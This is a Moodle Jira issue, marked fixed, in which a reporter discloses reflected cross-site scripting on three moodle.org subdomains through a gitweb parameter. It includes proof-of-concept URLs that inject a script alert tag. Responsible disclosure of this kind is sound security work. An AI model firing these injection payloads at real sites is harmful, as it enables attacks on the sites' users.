Uploaded image for project: 'Moodle Community Sites'
  1. Moodle Community Sites
  2. MDLSITE-3072

XSS on 3+ Moodle Subdomains

XMLWordPrintable

    • Icon: Bug Bug
    • Resolution: Fixed
    • Icon: High High
    • git.moodle.org
    • None

      To Whom It May Concern,

      I am reporting a few XSS security issues in accordance with your Bug
      Bounty security policy:

      https://moodle.org/mod/forum/view.php?f=996&showall=1

      I have included the proof-of-concepts in the email below to help
      expedite the explanation process.

      The information in the attached file is not public.

      Please feel free to contact me if there are any questions. I look
      forward to working with you in order to remediate the reported issues.

      Thanks,
      Ken

      ------------------------------
      http://git.moodle.org/gw?f=%22/%3E%3Cscript%3Ealert%2810%29%3C/script%3E&a=history&hb=cee922825283e76290b681edda93cf09a03d546b&pg=1\n&p=integration.git
      ---------------------------------
      http://broadcast.moodle.org/gw?f="/><script>alert(10)</script>&a=history&hb=7d19bc135372f5e0dc98776871b0287b9b7353da&pg=1\n&p=moodle.git
      ---------------------------------
      http://conference.moodle.org/gw?f="/><script>alert(10)</script>&a=history&hb=cee922825283e76290b681edda93cf09a03d546b&pg=1\n&p=integration.git

            mspurrier Matt Spurrier
            kbelva Kenneth Belva
            David Mudrák (@mudrd8mz) David Mudrák (@mudrd8mz)
            Votes:
            1 Vote for this issue
            Watchers:
            6 Start watching this issue

              Created:
              Updated:
              Resolved:

                Error rendering 'clockify-timesheets-time-tracking-reports:timer-sidebar'. Please contact your Jira administrators.